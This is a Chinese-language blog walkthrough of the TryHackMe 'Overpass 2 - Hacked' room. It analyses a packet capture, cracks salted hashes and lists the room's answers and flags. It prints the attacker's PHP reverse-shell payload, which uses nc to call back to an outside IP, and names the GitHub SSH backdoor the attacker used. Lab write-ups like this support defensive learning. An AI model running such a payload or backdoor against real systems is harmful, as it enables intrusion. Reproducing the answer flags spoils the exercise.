tryhackme--Overpass 2 - Hacked

  • Task 1 -Forensics - Analyse the PCAP
    • #1 What was the URL of the page they used to upload a reverse shell?
    • #2 What payload did the attacker use to gain access?
    • #3 What password did the attacker use to privesc?
    • #4 How did the attacker establish persistence?
    • #5 Using the fasttrack wordlist, how many of the system passwords were crackable?
  • Task 2 Research - Analyse the code
    • #1 What's the default hash for the backdoor?
    • #2 What's the hardcoded salt for the backdoor?
    • #3 What was the hash that the attacker used? - go back to the PCAP for this!
    • #4 Crack the hash using rockyou and a cracking tool of your choice. What's the password?
  • Task 3 Attack - Get back in!
    • #1 The attacker defaced the website. What message did they leave as a heading?
    • #3 What's the user flag?
    • #3 What's the root flag?
  • ps:

日常一篇博客~~~~

今天分享的是tryhackme的一道取证题。

Task 1 -Forensics - Analyse the PCAP

#1 What was the URL of the page they used to upload a reverse shell?

查看http数据包,我们从请求和响应可以知道攻击者的ip:192.168.170.145,服务器的ip:192.168.170.159,并且/development/目录上还有一个upload.php,故答案

/development/

#2 What payload did the attacker use to gain access?

搜索关键字符,发现payload.php,TCP追踪流查看具体发包数据


攻击者利用upload.php新上传了一个payload.php,从内容上看是一个反弹shell

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#3 What password did the attacker use to privesc?

继续查看该payload执行了什么命令,TCP追踪流,


该用户从www切换到james用户,密码为:

whenevernoteartinstant

#4 How did the attacker establish persistence?

继续查看攻击者的攻击命令,发现james可以以任何用户执行任何命令,这个属于配置上的错误。往下看攻击者先是看了/etc/passwd文件,再从github上面下载了一个ssh后门并安装执行。

https://github.com/NinjaJc01/ssh-backdoor

#5 Using the fasttrack wordlist, how many of the system passwords were crackable?

该服务器一共有5个用户,攻击者现在已经知道james用户的密码,只需破解剩下四个用户的密码即可,在kali使用john爆破也可以。

4

Task 2 Research - Analyse the code

#1 What’s the default hash for the backdoor?

查看mian.go

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

#2 What’s the hardcoded salt for the backdoor?

求该hash算法的盐

1c362db832f3f864c8c2fe05f2002a05

#3 What was the hash that the attacker used? - go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

通过算法我们可以知道密码加盐加密成hash,即

SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'


接下来我们用hashcat爆破密码

november16

Task 3 Attack - Get back in!

#1 The attacker defaced the website. What message did they leave as a heading?

访问http服务

H4ck3d by CooctusClan

#3 What’s the user flag?

用ssh后门登录服务器,在james在家目录找到user.txt

thm{d119b4fa8c497ddb0525f7ad200e6567}

#3 What’s the root flag?

发现一个可疑的suid文件,/home/james/.suid_bash

bash命令的提权方法,不过这个是二进制文件直接执行就好了。

执行拿到flag

thm{d53b2684f169360bb9606c333873144d}

ps:

个人站点博客:XingHe,欢迎来踩~

tryhackme--Overpass 2 - Hacked相关推荐

  1. Tryhackme-Advanced Exploitation

    Advanced Exploitation 文章目录 Advanced Exploitation Daily Bugle Task1 Deploy Task2 Obtain user and root ...

  2. Commonly Hacked Ports

    2019独角兽企业重金招聘Python工程师标准>>> Commonly Hacked Ports Related Book Hacking For Dummies, 5th Edi ...

  3. How I Hacked 40 Websites in 7 minutes

    Last summer I started learning about information security and hacking. Over the last year I've playe ...

  4. Hacked【黑客】手游攻略

    目录 Chapter 1 The Hackpad Increment me Positive Absolute Absolute2 Chapter 2 High School Hack Power P ...

  5. Hacked Exam-Google Codejam 2021 Round 1A

    Hacked Exam-Google Codejam 2021 Round 1A第三题 There is an exam with Q(1 ≤\leq≤ Q ≤\leq≤ 120)true or fa ...

  6. Hacked?软件监控邮箱账号是否存在数据泄露情况

    "Hacked?"是Windows 10 PC/Mobile的一款新软件,它可以帮助用户监控其网络账号是否存在数据泄露的情况.该软件利用Have I been pwned?的API ...

  7. Hacked by 1BYTE

    偶然发现IE的窗口标题 不知道什么时候在后面被加了个"Hacked by 1BYTE",晕 在网上找了找没找到什么,好不容易有个space上好像是说这个的,但是不是中文也不是英文, ...

  8. xbox360 corona hacked, RGH3成功破解corona

    *** mr_evil joined #RGH3 http://www.team-xecuter.com/forums/showthread.php?t=89096 Topic set by k3rn ...

  9. Kernel.org hacked – how to get Android repo?

    最近下载android源码报错误如下: curl: (7) couldn't connect to host和 [text] view plaincopy root@localhost WORKING ...

最新文章

  1. C++中模板template typename T
  2. windows常用命令有哪些(整理)
  3. ux设计_从UX设计人员的角度来看Microsoft Build 2018
  4. MongoDB 5.0 来了,原生时序、版本化 API 新特性悉数登场
  5. python代码怎么变成软件_Python变成技术
  6. 前端之旅,做一点有回报的事情
  7. 【软件质量】软件可维护性
  8. bagging和时间序列预测_时间序列多步预测的五种策略
  9. Spring AOP(二)之AfterReturning增强处理
  10. ctf杂项各类编码汇总
  11. 硬盘功率测试软件,CPU功耗检测
  12. redis数据更新操作
  13. html input文字缩进,使用HTML Tidy来缩进HTML代码?
  14. 大数据的价值可以体现在哪些方面?
  15. android 373dpi对应的布局,[荣耀6X BLN-AL10] EMUI5.0 B373 自定义DPI 来电闪光 接听 录音 核心控制 性能调节 游戏模式 稳定精简顺畅等...
  16. XPosed及插件安装(解决下载http://dl.xposed.info/repo/full.xml.gz时出错的问题)
  17. 如何退出UC浏览器登录账号
  18. bzoj4768: wxh loves substring //后缀平衡树
  19. APP支付之使用ApplePay支付开发步骤
  20. 从陶潜的“化”到王维的“空”

热门文章

  1. ThinkPHP6集成腾讯云、短信宝短信发送的工具类
  2. 电脑开机进不了系统卡在加载界面怎么办?
  3. 微信公众号图文中怎么下载封面图?
  4. PaddleOCR 文字检测部分源码学习(8)-损失函数(4)
  5. 工作了一辈子,你的住房公积金一共能有多少钱?
  6. 日文图片翻译器扫描_微信如何巧变中英文翻译器?三招教你解决翻译难题
  7. 2-人的发声原理和听觉原理
  8. 易图通: 路口三维实景导航面面观
  9. JAVA笔试题笔记(二)
  10. 最优秀好用的免费文件压缩/解压缩工具软件 (可替代WinRAR与7-Zip)——Bandizip